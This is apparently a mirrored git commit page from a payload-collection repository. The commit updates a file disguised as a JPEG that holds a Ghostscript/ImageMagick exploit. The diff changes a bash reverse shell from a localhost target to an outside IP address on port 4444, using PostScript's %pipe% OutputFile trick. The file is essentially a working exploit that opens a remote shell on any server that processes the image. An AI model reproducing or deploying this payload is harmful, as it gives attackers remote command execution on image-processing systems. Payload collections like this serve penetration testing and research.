mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2026-05-07 12:07:37 +02:00
Update imagemagik_ghostscript_reverse_shell.jpg
This commit is contained in:
parent
e961fef231
commit
0e308abccd
1 changed files with 1 additions and 1 deletions
|
|
@ -3,4 +3,4 @@ userdict /setpagedevice undef
|
|||
legal
|
||||
{ null restore } stopped { pop } if
|
||||
legal
|
||||
mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/127.0.0.1/8080 0>&1') currentdevice putdeviceprops
|
||||
mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/62.146.178.137/4444 0>&1') currentdevice putdeviceprops
|
||||
|
|
|
|||
Loading…
Reference in a new issue